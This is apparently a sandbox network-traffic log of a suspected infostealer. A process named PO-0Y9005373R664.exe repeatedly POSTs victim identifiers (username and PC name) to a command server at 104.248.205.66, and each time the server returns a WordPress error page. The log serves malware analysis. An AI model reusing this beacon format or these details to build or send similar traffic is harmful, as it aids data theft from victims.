                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:31.572997093 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:03:31.573010921 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        16192.168.2.849736104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:31.845665932 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:31.850642920 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:34.162789106 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:32 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:34.162826061 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Aug 29, 2024 12:03:34.162837982 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Aug 29, 2024 12:03:34.162854910 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        17192.168.2.849737104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:34.478476048 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:34.483481884 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:37.353600979 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:35 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:37.353660107 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:03:37.353672028 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        18192.168.2.849738104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:37.498574018 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:37.503478050 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:39.972309113 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:38 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:39.972330093 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:03:39.972342014 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        19192.168.2.849740104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:40.133356094 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:40.138811111 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:42.412266970 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:40 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:42.412292957 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:03:42.412311077 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        20192.168.2.849741104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:42.558893919 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:42.563781977 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:44.843158960 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:43 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:44.843204975 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
